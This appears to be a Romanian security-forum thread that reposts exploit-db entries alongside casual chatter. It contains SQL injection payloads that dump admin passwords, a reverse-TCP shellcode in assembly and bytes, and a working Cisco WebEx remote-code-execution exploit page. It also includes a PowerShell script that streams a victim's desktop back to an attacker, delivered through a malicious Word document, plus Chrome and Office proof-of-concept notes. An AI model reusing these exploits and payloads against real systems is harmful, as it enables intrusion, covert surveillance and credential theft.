Massaro

# # # # # # Exploit Title: Youtube Analytics Multi Channel v3.0 - SQL Injection # Google Dork: N/A # Date: 10.02.2017 # Vendor Homepage: http://vtcreators.com/ # Software Buy: https://codecanyon.net/item/youtube-analytics-multi-channel/14720919 # Demo: http://demo.vtcreators.com/yamc/ # Version: 3.0 # Tested on: Win7 x64, Kali Linux x64 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Mail : ihsan[@]ihsan[.]net # # # # # # SQL Injection/Exploit : # Login as regular user # http://localhost/[PATH]/index.php/user_management/update?id=[SQL] # Etc... # # # # # Sursa: https://www.exploit-db.com/exploits/41293/.

########### Reverse TCP Staged Alphanumeric Shellcode Linux x86 Execve /bin/sh ######## ########### Author: Snir Levi, Applitects ############# ## 103 Bytes ## date: 9.2.17 Automatic python shellcode handler (with stage preset send) will be ready soon: https://github.com/snir-levi/Reverse_TCP_Alphanumeric_Staged_Shellcode_Execve-bin-bash/ IP - 127.0.0.1 PORT - 4444 #### Stage Alphanumeric shellcode: ##### Stage 1: dup2 stdin syscall: WXW[j?XV[WYPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXP W push edi X pop eax W push edi [ pop ebx j? push 0x3f X pop eax V push esi [ pop ebx W push edi Y pop ecx P push eax X pop eax P push eax X pop EAX Stage 2: dup2 stdout syscall: WXW[j?XV[WYAPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPX W push edi X pop eax W push edi [ pop ebx j? push 0x3f X pop eax V push esi [ pop ebx W push edi Y pop ecx A inc ecx (ecx =1) P push eax X pop eax P push eax Stage 3: dup2 stderr syscall: WXW[j?XV[WYAPXAPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXP W push edi X pop eax W push edi [ pop ebx j? push 0x3f X pop eax V push esi [ pop ebx W push edi Y pop ecx A*2 inc ecx (ecx = 2) P push eax X pop eax A inc ecx Stage 3: execve /bin/sh: j0XHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHWYWZWh//shh/binT[ j0 push 0x30 X pop eax H*32 dec eax //eax = 0x0b W push edi Y pop ecx W push edi Z pop edx W push edi // null terminator h//sh push 0x68732f2f //sh h/bin push 0x6e69622f /bin T push esp [ pop ebx Usage: Victim Executes the shellcode, and opens tcp connection Stage: After Connection is established, send the 4 stages ***separately*** nc -lvp 4444 connect to [127.0.0.1] from localhost [127.0.0.1] (port) WXW[j?XV[WYPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXP WXW[j?XV[WYAPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPX WXW[j?XV[WYAPXAPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXP j0XHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHWYWZWh//shh/binT[ whoami root id uid=0(root) gid=0(root) groups=0(root) global _start _start: ; sock = socket(AF_INET, SOCK_STREAM, 0) ; AF_INET = 2 ; SOCK_STREAM = 1 ; syscall number 102 - socketcall ; socket = 0x01 xor eax,eax xor esi,esi push eax pop edi push eax mov al, 0x66 push byte 0x1 pop ebx push byte ebx push byte 0x2 mov ecx, esp int 0x80 xchg esi, eax; save sock result ; server.sin_family = AF_INET ; server.sin_port = htons(PORT) ; server.sin_addr.s_addr = inet_addr("127.0.0.1") push byte 0x1 pop edx shl edx, 24 mov dl, 0x7f ;edx = 127.0.0.1 (hex) push edx push word 0x5c11 ;port 4444 push word 0x02 ; connect(sock, (struct sockaddr *)&server, sockaddr_len) mov al, 0x66 mov bl, 0x3 mov ecx, esp push byte 0x10 push ecx push esi mov ecx ,esp int 0x80 stageAddress: ;saves stage address to edx mov edx, [esp] sub bl,3 jnz stage call near stageAddress ;recv(int sockfd, void *buf, size_t len, int flags); stage: mov al, 0x66 mov bl, 10 push edi push word 100 ; buffer size push edi push esi ; socketfd mov [esp+4],esp ; sets esp as recv buffer mov ecx,esp int 0x80 mov al, 0xcd mov ah, 0x80 ; eax = int 0x80 mov bl, 0xFF mov bh, 0xE2 ; ebx = jmp edx mov [esp+57],al mov [esp+58],ah mov [esp+59], ebx ;the end of the buffer contains the syscall command int 0x80 and jmp back to stage jmp esp unsigned char[] = "\x31\xc0\x31\xf6\x50\x5f\x50\xb0\x66\x6a\x01\x5b\x53\x6a \x02\x89\xe1\xcd\x80\x96\x6a\x01\x5a\xc1\xe2\x18\xb2\x7f\x52 \x66\x68\x11\x5c\x66\x6a\x02\xb0\x66\xb3\x03\x89\xe1\x6a\x10\x51\x56\x89\xe1 \xcd\x80\x8b\x14\x24\x80\xeb\x03\x75\x05\xe8\xf3\xff\xff\xff \xb0\x66\xb3\x0a\x57\x66\x6a\x64\x57\x56\x89\x64\x24\x04\x89\xe1\xcd\x80\xb0 \xcd\xb4\x80\xb3\xff\xb7\xe2\x88\x44\x24\x39\x88\x64\x24\x3a \x89\x5c\x24\x3b\xff\xe4" Sursa: https://www.exploit-db.com/exploits/41282/.

<!-- Cisco's WebEx extension (jlhmfgmfgeifomenelglieieghnjghma) has ~20M active users, and is part of Cisco's popular web conferencing software. The extension works on any URL that contains the magic pattern "cwcsf-nativemsg-iframe-43c85c0d-d633-af5e-c056-32dc7efc570b.html", which can be extracted from the extensions manifest. Note that the pattern can occur in an iframe, so there is not necessarily any user-visible indication of what is happening, visiting any website would be enough. The extension uses nativeMessaging, so this magic string is enough for any website to execute arbitrary code (!!). The protocol the extension uses is complicated, using CustomEvent() objects to pass JSON messages between the webpage, the extension and the native code. Stepping through an initialization, a website must first request that the extension open a port for communication, like this: document.dispatchEvent(new CustomEvent("connect", { detail: { token: "token" }})); // token can be any string Then messages can passed to native code via "message" events. Note that these cannot be MessageEvent() objects, and you cannot use the postMessage API, they have to be CustomEvent() objects. There are a few different message types, such as "hello", "disconnect", etc. The most interesting is "launch_meeting": document.dispatchEvent(new CustomEvent("message", { detail: { message: JSON.stringify(msg), message_type: "launch_meeting", timestamp: (new Date()).toUTCString(), token: "token" } })); I stepped through a meeting and dumped the initialization messages: > message.message "{"DocshowVersion": "1.0", "FilterSecParameters": "clientparam;clientparam_value", "GpcProductRoot": "WebEx", "GpcMovingInSubdir": "Wanta", "GpcProductVersion": "T30_MC", "GpcUpgradeManagement": "false", "GpcCompatibleDesktopClients": "", "enableQuickLaunch": "1", "GpcProductDescription": "V2ViRXg=", "GpcUnpackName": "atgpcdec", "JMTSignificantFileList": "atgpcext.dll;atmccli.dll;comui.dll;webexmgr.dll;plugin-config.xml;atmgr.exe;ieatgpc.dll;atkbctl.dll;atwbxui15.dll;atcarmcl.dll;attp.dll;atarm.dll;wbxcrypt.dll;mmssl32.dll;libeay32.dll;ssleay32.dll;atmemmgr.dll;wcldll.dll;uilibres.dll;pfwres.dll;wbxtrace.dll;mcres.dll;atresec.dll;atrestc.dll;mfs.dll;mutilpd.dll;wseclient.dll;mticket.dll;wsertp.dll", "jmtclicklog": "1484862376664", "GpcExtName": "atgpcext", "GpcUnpackVersion": "27, 17, 2016, 501", "GpcExtVersion": "3015, 0, 2016, 1117", "GpcUrlRoot": "https://join-test.webex.com/client/WBXclient-T30L10NSP15EP1-10007/webex/self", "GpcComponentName": "YXRtY2NsaS5ETEw=", "GpcCompressMethod": "7z", "GpcActiveIniSection": "V2ViRXhfVg==", "GpcSupportPageUrl": "", "GpcIniFileName": "Z3BjLnBocD9wbW9kdWxlcz0lN0NNQ19TVEQlN0NDaGF0JTdDUG9sbGluZyU3Q05vdGUlN0NWaWRlb1NoYXJlJTdDV2ViZXhfUkElN0NBUyU3Q1BEJk9TPVZUJnJlcGxhY2VLZXk9VklTVEElN0NTU0YmTE49JmJhc2ljbmFtZT1XZWJFeF9WJk9TX0JpdD0zMg== ... There are a huge number of properties, many are obviously good candidates for code execution, but these jumped out at me: "GpcComponentName": "YXRtY2NsaS5ETEw=", "GpcInitCall": "c3pDb29raWU9SW5pdENvbnRyb2woJUhXTkQpO05hbWVWYWx1ZShMb2dnaW5nVVJMX05hbWUsTG9nZ2luZ1VSTCk7TmFtZVZhbHVlKE1lZXRpbmdJRF9OYW1lLE1lZXRpbmdJRCk7TmFtZVZhbHVlKFNlc3Npb25JRF9OYW1lLFNlc3Npb25JRCk7TmFtZVZhbHVlKEdwY0luaUZpbGVOYW1lX05hbWUsR3BjSW5pRmlsZU5hbWUpO05hbWVWYWx1ZShHcGNVcmxSb290X05hbWUsR3BjVXJsUm9vdCk7TmFtZVZhbHVlKEdwY0V4dFZlcnNpb25fTmFtZSxHcGNFeHRWZXJzaW9uKTtOYW1lVmFsdWUoR3BjVW5wYWNrVmVyc2lvbl9OYW1lLEdwY1VucGFja1ZlcnNpb24pO05hbWVWYWx1ZShHcGNQcm9kdWN0Um9vdF9OYW1lLEdwY1Byb2R1Y3RSb290KTtOYW1lVmFsdWUobG9jYWxyb290c2VjdGlvbnZlcl9OYW1lLGxvY2Fscm9vdHNlY3Rpb252ZXIpO05hbWVWYWx1ZShSZWdUeXBlX05hbWUsUmVnVHlwZSk7TmFtZVZhbHVlKEdwY1Byb2dyZXNzQmFyVGl0bGVfTmFtZSxHcGNQcm9ncmVzc0JhclRpdGxlKTtOYW1lVmFsdWUoR3BjTWVzc2FnZVRpdGxlX05hbWUsR3BjTWVzc2FnZVRpdGxlKTtOYW1lVmFsdWUoZG93bmxvYWRsb2NhbHNldHRpbmdfTmFtZSxkb3dubG9hZGxvY2Fsc2V0dGluZyk7TmFtZVZhbHVlKHByb2R1Y3RuYW1lX05hbWUscHJvZHVjdG5hbWUpO05hbWVWYWx1ZShTRlN1cHBvcnRpbmdfTmFtZSxTRlN1cHBvcnRpbmdfVmFsdWUpO05hbWVWYWx1ZShNZWV0aW5nUmFuZG9tX05hbWUsTWVldGluZ1JhbmRvbSk7TmFtZVZhbHVlKGNsaWVudHBhcmFtX05hbWUsY2xpZW50cGFyYW1fVmFsdWUpO0ZpbmlzaENhbGwoc3pDb29raWUpOw==", If we decode those strings, we get: GpcComponentName: "atmccli.DLL" GpcInitCall: "szCookie=InitControl(%HWND);NameValue(LoggingURL_Name,LoggingURL);NameValue(MeetingID_Name,MeetingID);NameValue(SessionID_Name,SessionID);NameValue(GpcIniFileName_Name,GpcIniFileName);NameValue(GpcUrlRoot_Name,GpcUrlRoot);NameValue(GpcExtVersion_Name,GpcExtVersion);NameValue(GpcUnpackVersion_Name,GpcUnpackVersion);NameValue(GpcProductRoot_Name,GpcProductRoot);NameValue(localrootsectionver_Name,localrootsectionver);NameValue(RegType_Name,RegType);NameValue(GpcProgressBarTitle_Name,GpcProgressBarTitle);NameValue(GpcMessageTitle_Name,GpcMessageTitle);NameValue(downloadlocalsetting_Name,downloadlocalsetting);NameValue(productname_Name,productname);NameValue(SFSupporting_Name,SFSupporting_Value);NameValue(MeetingRandom_Name,MeetingRandom);NameValue(clientparam_Name,clientparam_Value);FinishCall(szCookie);" That looks like some sort of weird scripting language. The presence of `HWND` suggests this is interacting with native code, and if I dump the exports of atmccli.DLL: $ dumpbin /nologo /exports atmccli.dll Dump of file atmccli.dll ordinal hint RVA name 2 2 0001CC11 ExitControl 24 3 0001CC83 FinishCall 1 4 0001D2F9 InitControl <-- 23 5 0001D556 NameValue ... These exports look like the functions being called in that scripting language. Is it possible it's calling those exports? I noticed that they ship a copy of the CRT (Microsoft's C Runtime, containing standard routines like printf, malloc, etc), so I tried calling the standard _wsystem() routime (like system(), but for WCHAR strings), like this: var msg = { GpcProductRoot: "WebEx", GpcMovingInSubdir: "Wanta", GpcProductVersion: "T30_MC", GpcUnpackName: "atgpcdec", GpcExtName: "atgpcext", GpcUnpackVersion: "27, 17, 2016, 501", GpcExtVersion: "3015, 0, 2016, 1117", GpcUrlRoot: "http://127.0.0.1/", GpcComponentName: btoa("MSVCR100.DLL"), GpcSuppressInstallation: btoa("True"), GpcFullPage: "True", GpcInitCall: btoa("_wsystem(ExploitShellCommand);"), ExploitShellCommand: btoa("calc.exe"), } Unbelievably, that worked. Example exploit attached. I uploaded a demo here for testing (this URL is secret) https://lock.cmpxchg8b.com/ieXohz9t/ (You can make sure WebEx is installed and working first by going here. You don't need to register, just enter any name and email) https://www.webex.com/test-meeting.html --> <html> <head> <title>Cisco WebEx Exploit</title> <script> var msg = { GpcProductRoot: "WebEx", GpcMovingInSubdir: "Wanta", GpcProductVersion: "T30_MC", GpcUnpackName: "atgpcdec", GpcExtName: "atgpcext", GpcUnpackVersion: "27, 17, 2016, 501", GpcExtVersion: "3015, 0, 2016, 1117", GpcUrlRoot: "http://127.0.0.1/", GpcComponentName: btoa("MSVCR100.DLL"), GpcSuppressInstallation: btoa("True"), GpcFullPage: "True", GpcInitCall: btoa("_wsystem(ExploitShellCommand);"), ExploitShellCommand: btoa("calc.exe"), } function runcode() { if (!document.location.pathname.endsWith("cwcsf-nativemsg-iframe-43c85c0d-d633-af5e-c056-32dc7efc570b.html")) { alert("document /must/ be named cwcsf-nativemsg-iframe-43c85c0d-d633-af5e-c056-32dc7efc570b.html"); return; } if (!document.location.protocol.endsWith("https:")) { alert("document /must/ be served over https"); return; } document.dispatchEvent(new CustomEvent("connect", { detail: { token: "token" }})); document.dispatchEvent(new CustomEvent("message", { detail: { message: JSON.stringify(msg), message_type: "launch_meeting", timestamp: (new Date()).toUTCString(), token: "token" } })); } </script> </head> <body onload="runcode()"> <h1>Running exploit...</h1> </body> </html> Sursa: https://www.exploit-db.com/exploits/41148/.

# # # # # # Exploit Title: MySQL Blob Uploader - File Upload to Database PHP Script v1.0 - SQL Injection # Google Dork: N/A # Date: 07.02.2017 # Vendor Homepage: http://nelliwinne.net/ # Software Buy: https://codecanyon.net/item/mysql-file-and-image-uploader-and-sharing-blob-file-server/17748300 # Demo: http://demos.nelliwinne.net/MySqlFileUpload/ # Version: 1.0 # Tested on: Win7 x64, Kali Linux x64 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Mail : ihsan[@]ihsan[.]net # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/download.php?id=[SQL]&t=files # -9999'+/*!50000union*/+select+1,concat_ws(un,0x3c62723e,0x3c62723e,pw),3,4,5,6+from+admin-- -&t=files # http://localhost/[PATH]/download.php?id=[SQL]&t=images_title # -9999'+/*!50000union*/+select+1,concat_ws(un,0x3c62723e,0x3c62723e,pw),3,4,5,6,7+from+admin-- -&t=images_title # Etc....Other files have vulnerabilities ... # # # # # Sursa: https://www.exploit-db.com/exploits/41267/.

Coaie, invata sa dai si tu "Remove format" data viitoare cand mai copiezi ceva. Tie iti place cum arata? Iti place o pula.

La fel imi face si mie. Era la fel si inainte sa se schimbe serverul, cred ca e de la noi.

Veche, dar am dat iar peste ea: Why programmers like UNIX: unzip, strip, touch, finger, grep, mount, fsck, more, yes, fsck, fsck, fsck, umount, sleep.

Ce pula? Ai gasit un topic cu... conturi pentru filme porno si iti tre' parola sa ai acces si tu la ele?

Nu gasesti. Ar trebui sa fie random, cica, dar mie mi-au dat un CD Key care nici nu arata ca celelalte. Logic ca n-a mers, so... nu incercati.

Bine ai venit. In sfarsit mai vad si eu Bistriteni activi pe-aici.

https://www.exploit-db.com/docs/40143.pdf

https://www.exploit-db.com/exploits/38513/.

Recently, I have been working on an interesting concept. I wanted to use MJPEG to stream images in real time from a target desktop to be able to see the activity of a target user. I literally spent weeks to get it working but in the end, it turned out that a small piece of PowerShell code could be used to achieve this. Anyway, I give you Show-TargetScreen.ps1. This script can stream a target's desktop in real time and the stream could be seen in browsers which support MJPEG (Firefox). Show-TargetScreen is available in the Gather category of Nishang. The current source code looks like this: function Show-TargetScreen { <# .SYNOPSIS Nishang script which can be used for streaming a target's desktop using MJPEG. .DESCRIPTION This script uses MJPEG to stream a target's desktop in real time. It is able to connect to a standard netcat listening on a port when using the -Reverse switch. Also, a standard netcat can connect to this script Bind to a specific port. A netcat listener which relays connection to a local port could be used as listener. A browser which supports MJPEG (Firefox) should then be pointed to the local port to see the remote desktop. The script should be used with Client Side Attacks. .PARAMETER IPAddress The IP address to connect to when using the -Reverse switch. .PARAMETER Port The port to connect to when using the -Reverse switch. When using -Bind it is the port on which this script listens. .EXAMPLE PS > Show-TargetScreen -Reverse -IPAddress 192.168.2301.1 -Port 443 Above shows an example of aa reverse connection. A netcat/powercat listener must be listening on the given IP and port. .EXAMPLE PS > Out-Word -PayloadURL "http://192.168.1.6/Show-TargetScreen.ps1" -Arguments "Show-TargetScreen -Reverse -IPAddress 192.168.1.6 -Port 443" Above shows an example using the script in a client side attack. .EXAMPLE PS > Show-TargetScreen -Bind -Port 1234 Above shows an example of bind mode. Point Firefox to the IPAddress of the target and given port to see user's Desktop. .LINK http://www.labofapenetrationtester.com/2015/12/stream-targets-desktop-using-mjpeg-and-powershell.html https://github.com/samratashok/nishang #> [CmdletBinding(DefaultParameterSetName="reverse")] Param( [Parameter(Position = 0, Mandatory = $true, ParameterSetName="reverse")] [Parameter(Position = 0, Mandatory = $false, ParameterSetName="bind")] [String] $IPAddress, [Parameter(Position = 1, Mandatory = $true, ParameterSetName="reverse")] [Parameter(Position = 1, Mandatory = $true, ParameterSetName="bind")] [Int] $Port, [Parameter(ParameterSetName="reverse")] [Switch] $Reverse, [Parameter(ParameterSetName="bind")] [Switch] $Bind ) while ($true) { try { Add-Type -AssemblyName System.Windows.Forms [System.IO.MemoryStream] $MemoryStream = New-Object System.IO.MemoryStream #Connect back if the reverse switch is used. if ($Reverse) { $socket = New-Object System.Net.Sockets.Socket ([System.Net.Sockets.AddressFamily]::InterNetwork, [System.Net.Sockets.SocketType]::Stream, [System.Net.Sockets.ProtocolType]::Tcp) $socket.Connect($IPAddress,$Port) Write-Verbose "Connected to $IPAddress" } #Bind to the provided port if Bind switch is used. if ($Bind) { #Start a listener $endpoint = new-object System.Net.IPEndPoint ([system.net.ipaddress]::any, $Port) $server = new-object System.Net.Sockets.TcpListener $endpoint $server.Start() $buffer = New-Object byte[] 1024 $socket = $server.AcceptSocket() } #https://evilevelive.wordpress.com/2009/03/09/web-server-written-in-powershell/ function SendResponse($sock, $string) { if ($sock.Connected) { $bytesSent = $sock.Send( $string) if ( $bytesSent -eq -1 ) { Write-Output "Send failed to " + $sock.RemoteEndPoint } } } function SendStrResponse($sock, $string) { if ($sock.Connected) { $bytesSent = $sock.Send( [text.Encoding]::Ascii.GetBytes($string)) if ( $bytesSent -eq -1 ) { Write-Output ("Send failed to " + $sock.RemoteEndPoint) } } } #Create the header for MJPEG stream function SendHeader( [net.sockets.socket] $sock, $length, $statusCode = "200 OK", $mimeHeader="text/html", $httpVersion="HTTP/1.1" ) { $response = "HTTP/1.1 $statusCode`r`n" + "Content-Type: multipart/x-mixed-replace; boundary=--boundary`r`n`n" SendStrResponse $sock $response Write-Verbose "Header sent to $IPAddress" } #Send the header SendHeader $socket while ($True) { $b = New-Object System.Drawing.Bitmap([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width, [System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height) $g = [System.Drawing.Graphics]::FromImage($ $g.CopyFromScreen((New-Object System.Drawing.Point(0,0)), (New-Object System.Drawing.Point(0,0)), $b.Size) $g.Dispose() $MemoryStream.SetLength(0) $b.Save($MemoryStream, ([system.drawing.imaging.imageformat]::jpeg)) $b.Dispose() $length = $MemoryStream.Length [byte[]] $Bytes = $MemoryStream.ToArray() #Set the boundary for the multi-part request $str = "`n`n--boundary`n" + "Content-Type: image/jpeg`n" + "Content-Length: $length`n`n" #Send Requests SendStrResponse $socket $str SendResponse $socket $Bytes } $MemoryStream.Close() } catch { Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port." Write-Error $_ } } } Now, to use it for reverse connect, to avoid having to write a listener/server, I used powercat to run a local relay to which Show-TargetScreen connects and we point Firefox to the local port. So, start a powercat listener and relay to any local port. In the below command, Show-TargetScreen will connect to port 443 and Firefox will connect to Port 9000: PS C:\nishang> powercat -l -v -p 443 -r tcp:9000 -rep -t 1000 Note that if on a *nix machine, netcat could be used as well. Now, to be able to stream a user's Desktop, Show-TargetScreen must be used with a client side attack. Let's use it with Out-Word from Nishang. Since like other Nishang scripts, Show-TargetScreen.ps1 loads a function with same name, we should pass an argument -"Show-TargetScreen -Reverse -IPAddress 192.168.1.6 -Port 443", and use it as a payload for Out-Word. PS C:\nishang> Out-Word -PayloadURL "http://192.168.1.6/Show-TargetScreen.ps1" -Arguments "Show-TargetScreen -Reverse -IPAddress 192.168.1.6 -Port 443" Now, the generated doc file is to be sent to a target. As soon as a target user opens up the Word file, we will have a connect back on the powercat listener which will relay to the configured local port (TCP 9000 in this example). Now if we point Firefox to http://127.0.0.1:9000, we have a live stream of the target user's Desktop. Awesome! Isn't it? I recently tried this in couple of pen tests and was quite satisfied with the results. Sursa: Lab of a Penetration Tester: Stream a target's Desktop using MJPEG and PowerShell.

Ai placa video integrata. Nu indeplinesti cerintele minime sa rulezi jocul ala. Probabil ca-ti tre' pixel shade 3.0 si tu ai de exemplu doar 2.0.

Source: https://code.google.com/p/google-security-research/issues/detail?id=664 There is an overflow in the ui::PlatformCursor WebCursor::GetPlatformCursor method. In src/content/common/cursors/webcursor_aurax11.cc&q=webcursor_aurax11.cc, there is the following code: bitmap.allocN32Pixels(custom_size_.width(), custom_size_.height()); memcpy(bitmap.getAddr32(0, 0), custom_data_.data(), custom_data_.size()); The bitmap buffer is allocated based on the width and height of the custom_size_, but the memcpy is performed using the size of the custom_data_. These values are set during WebCursor deserialization in src/content/common/cursors/webcursor.cc in WebCursor::Deserialize. custom_size_ is set from two integers that a deserialized from a message and can be between 0 and 1024. custom_data_ is set from a vector that is deserialized, and can be any size, unrelated to the width and height. The custom_data_ is verified not to be smaller than the expected pixel buffer based on the width and height, but can be longer. GetPlatformCursor is called indirectly by RenderWidgetHostImpl::OnSetCursor, which is called in response to a ViewHostMsg_SetCursor message from the renderer. The issue above is in the x11 implementation, but it appears also affect other platform-specific implementations other than the Windows one, which instead reads out of bounds. I recommend this issue be fixed by changing the check in WebCursor::Deserialize: if (size_x * size_y * 4 > data_len) return false; to if (size_x * size_y * 4 != data_len) return false; to prevent the issue in all platform-specific implementations. To reproduce the issue replace WebCursor::Serialize with: bool WebCursor::Serialize(base::Pickle* pickle) const { if(type_ == WebCursorInfo::TypeCustom){ LOG(WARNING) << "IN SERIALIZE\n"; if (!pickle->WriteInt(type_) || !pickle->WriteInt(hotspot_.)) || !pickle->WriteInt(hotspot_.y()) || !pickle->WriteInt(2) || !pickle->WriteInt(1) || !pickle->WriteFloat(custom_scale_)) return false; }else{ if (!pickle->WriteInt(type_) || !pickle->WriteInt(hotspot_.)) || !pickle->WriteInt(hotspot_.y()) || !pickle->WriteInt(custom_size_.width()) || !pickle->WriteInt(custom_size_.height()) || !pickle->WriteFloat(custom_scale_)) return false; } const char* data = NULL; if (!custom_data_.empty()) data = &custom_data_[0]; if (!pickle->WriteData(data, custom_data_.size())) return false; return SerializePlatformData(pickle); } and visit the attached html page, with the attached image in the same directory. Proof of Concept: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39039.zip Sursa: https://www.exploit-db.com/exploits/39039/.

Source: https://code.google.com/p/google-security-research/issues/detail?id=556 It is possible for an attacker to execute a DLL planting attack in Microsoft Office 2010 on Windows 7 x86 with a specially crafted OLE object. This attack also works on Office 2013 running on Windows 7 x64. Other platforms were not tested. The attached POC document "planted-mqrt.doc" contains what was originally an embedded Packager object. The CLSID for this object was changed at offset 0x2650 to be {ecabafc9-7f19-11d2-978e-0000f8757e2a} (formatted as pack(">IHHBBBBBBBB")). This object has a InProcServer32 pointing to comsvcs.dll. Specifically the CQueueAdmin object implemented in the dll. When a user opens this document and single clicks on the icon for foo.txt ole32!OleLoad is invoked on our vulnerable CLSID. This results in a call to a class factory constructor that tries eventually tries to call mqrt!MQGetPrivateComputerInformation. Because mqrt is a delay loaded dll the loader has inserted a stub to call _tailMerge_mqrt_dll on the first call of this function. This results in a kernelbase!LoadLibraryExA call vulnerable to dll planting. If the attached mqrt.dll is placed in the same directory with the planted-mqrt.doc file you should see a popup coming from this DLL being loaded from the current working directory of Word. It's worth noting that there are several other delay loaded dlls in reachable from comsvcs.dll as well. The full list is: ADVAPI32.dll API_MS_WIN_Service_Management_L1_1_0.dll API_MS_WIN_Service_Management_L2_1_0.dll API_MS_WIN_Service_winsvc_L1_1_0.dll API_MS_Win_Security_SDDL_L1_1_0.dll CLBCatQ.DLL CRYPTSP.dll MTXCLU.DLL ODBC32.dll VERSION.dll XOLEHLP.dll colbact.DLL dbghelp.dll mqrt.dll netutils.dll samcli.dll Here is the call stack from the delay loaded mqrt.dll: 0:000> kb ChildEBP RetAddr Args to Child 001b7cb4 76f15d1c 76f30924 00000460 ffffffff ntdll!KiFastSystemCallRet 001b7cb8 76f30924 00000460 ffffffff 001b7da0 ntdll!ZwMapViewOfSection+0xc 001b7d0c 76f3099a 00000460 00000000 00000000 ntdll!LdrpMapViewOfSection+0xc7 001b7da4 76f2fec4 001b7df0 001b7f00 00000000 ntdll!LdrpFindOrMapDll+0x310 001b7f24 76f325ea 001b7f84 001b7f50 00000000 ntdll!LdrpLoadDll+0x2b6 001b7f58 75188c19 003a8aac 001b7f9c 001b7f84 ntdll!LdrLoadDll+0x92 001b7f94 751890ac 00000000 00000000 003a8aac KERNELBASE!LoadLibraryExW+0x1d9 001b7fb4 70dd96c0 70e8de20 00000000 00000000 KERNELBASE!LoadLibraryExA+0x26 001b8000 70e7cb2b 00000000 70e94148 003768a0 comsvcs!__delayLoadHelper2+0x59 001b8054 70e7588e 70ea52ec 5160c47e 8007000e comsvcs!_tailMerge_mqrt_dll+0xd 001b8088 70e75c09 069d8cf8 70dd31ac 5160c442 comsvcs!CMSMQRT::Load+0x3a 001b8090 70dd31ac 5160c442 00000000 001b8114 comsvcs!CQueueAdmin::FinalConstruct+0xa 001b80b4 70dd47ef 00000000 001b9880 069d8cf8 comsvcs!ATL::CComCreator<ATL::CComObject<CQueueAdmin> >::CreateInstance+0x50 001b80c8 70dc7d08 00000000 001b9880 001b8114 comsvcs!ATL::CComCreator2<ATL::CComCreator<ATL::CComObject<CQueueAdmin> >,ATL::CComFailCreator<-2147221232> >::CreateInstance+0x18 001b80e0 765e8c86 06988358 00000000 001b9880 comsvcs!ATL::CComClassFactory::CreateInstance+0x3b 001b8168 76603170 76706444 00000000 001b94e4 ole32!CServerContextActivator::CreateInstance+0x172 [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 1000] 001b81a8 765e8daa 001b94e4 00000000 00414230 ole32!ActivationPropertiesIn::DelegateCreateInstance+0x108 [d:\w7rtm\com\ole32\actprops\actprops.cxx @ 1917] 001b81fc 767602f1 7670646c 00000000 001b94e4 ole32!CApartmentActivator::CreateInstance+0x112 [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 2268] 001b8220 767c6311 765e8d36 001b8410 00000004 RPCRT4!Invoke+0x2a 001b8628 766fd7e6 06a70490 0678a6e8 067982b8 RPCRT4!NdrStubCall2+0x2d6 001b8670 766fd876 06a70490 067982b8 0678a6e8 ole32!CStdStubBuffer_Invoke+0xb6 [d:\w7rtm\com\rpc\ndrole\stub.cxx @ 1590] 001b86b8 766fddd0 067982b8 003a877c 00000000 ole32!SyncStubInvoke+0x3c [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 1187] 001b8704 76618a43 067982b8 06979020 06a70490 ole32!StubInvoke+0xb9 [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 1396] 001b87e0 76618938 0678a6e8 00000000 06a70490 ole32!CCtxComChnl::ContextInvoke+0xfa [d:\w7rtm\com\ole32\com\dcomrem\ctxchnl.cxx @ 1262] 001b87fc 766fa44c 067982b8 00000001 06a70490 ole32!MTAInvoke+0x1a [d:\w7rtm\com\ole32\com\dcomrem\callctrl.cxx @ 2105] 001b882c 766fdb41 d0908070 0678a6e8 06a70490 ole32!AppInvoke+0xab [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 1086] 001b890c 766fe1fd 06798260 003d6098 00000000 ole32!ComInvokeWithLockAndIPID+0x372 [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 1724] 001b8934 76619367 06798260 00000000 06798260 ole32!ComInvoke+0xc5 [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 1469] 001b8948 766fe356 06798260 06798260 0039d408 ole32!ThreadDispatch+0x23 [d:\w7rtm\com\ole32\com\dcomrem\chancont.cxx @ 298] 001b895c 766fe318 06798260 001b8a64 00000000 ole32!DispatchCall+0x27 [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 4273] 001b8988 766fcef0 001b8a50 001b8b78 0697fd00 ole32!CRpcChannelBuffer::SwitchAptAndDispatchCall+0xa1 [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 4321] 001b8a68 765f9d01 0697fd00 001b8b78 001b8b60 ole32!CRpcChannelBuffer::SendReceive2+0xef [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 4076] 001b8ae4 765f9b24 0697fd00 001b8b78 001b8b60 ole32!CAptRpcChnl::SendReceive+0xaf [d:\w7rtm\com\ole32\com\dcomrem\callctrl.cxx @ 603] 001b8b38 766fce06 0697fd00 001b8b78 001b8b60 ole32!CCtxComChnl::SendReceive+0x1c5 [d:\w7rtm\com\ole32\com\dcomrem\ctxchnl.cxx @ 